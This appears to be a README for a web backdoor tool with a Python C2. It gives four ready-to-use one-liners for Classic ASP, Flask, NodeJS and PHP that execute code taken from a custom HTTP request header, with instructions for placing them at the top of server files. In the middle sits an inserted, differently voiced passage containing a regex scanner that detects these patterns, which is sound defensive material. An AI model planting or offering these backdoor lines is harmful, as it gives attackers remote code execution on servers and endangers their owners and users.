This tool allows you to deploy and exploit backdoors with one line of code in Classic ASP, Flask, NodeJS, and PHP servers.
Add the following line to the top of the file you want to have the backdoor
<% If request.servervariables("EXPLOIT") <> "" Then:execute(request.servervariables("EXPLOIT")):response.end:End If %>
Add the following line to the top of the endpoint you want to have the backdoor
if request.headers.get('EXPLOIT'): global r;exec(__import__('base64').b64decode(request.headers.get('EXPLOIT').encode()).decode());return r;
Add the following line to the top of the endpoint you want to have the backdoor
isset($_SERVER["HTTP_EXPLOIT"]) and eval($_SERVER["HTTP_EXPLOIT"]);
Add the following line to the endpoint you want to have the backdoor
if (req.headers?.exploit) return (eval('let r=res;let i=req;'+req.headers?.exploit));
Replace res with the ServerResponse parameter name, and replace req with the IncomingRequest parameter name.
Any area where EXPLOIT or exploit is referenced can be replaced with any custom HTTP header (e.g. for PHP, HTTP_EXPLOIT -> HTTP_ANYTHINGYOUWANT).
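All four one-liners above share one shape that can be searched for in a code base: a request header value passed straight into execute, exec or eval. The scanner below is an added example, not code from this repository; the rule names, the extension list and the sample lines are assumptions made for illustration, and the header name is deliberately not matched because it can be renamed.

```python
import re
from pathlib import Path

# Heuristic rules: dynamic code execution fed directly from a request header.
# The header name itself is never matched, since it can be any custom value.
RULES = {
    "asp-execute-servervariables": re.compile(
        r"\bexecute(?:global)?\s*\(\s*request\.servervariables\s*\(", re.I),
    "php-eval-server-header": re.compile(
        r"\beval\s*\(\s*\$_SERVER\s*\[\s*[\"']HTTP_", re.I),
    # Covers Flask (exec of request.headers) and Node (eval of <param>.headers).
    "exec-or-eval-of-headers": re.compile(
        r"\b(?:exec|eval)\s*\(.*\.headers\b"),
}
EXTENSIONS = {".asp", ".php", ".py", ".js", ".mjs", ".ts"}  # assumed file types


def scan_text(text):
    """Return (line_number, rule_name) for every line that matches a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def scan_tree(root):
    """Scan server-side source files under root; returns {path: hits}."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed sample: a benign header read, then a renamed-header PHP variant.
SAMPLE = (
    'lang = request.headers.get("Accept-Language")\n'
    'isset($_SERVER["HTTP_X_TRACE"]) and eval($_SERVER["HTTP_X_TRACE"]);\n'
)

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

A hit is a lead for manual review, not proof of compromise; obfuscated or multi-line variants will not match these line-based rules.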
The C2 runs on Python. To start, run main.py in the src folder.
Coming soon.
This repository was inspired by PHPSPLOIT.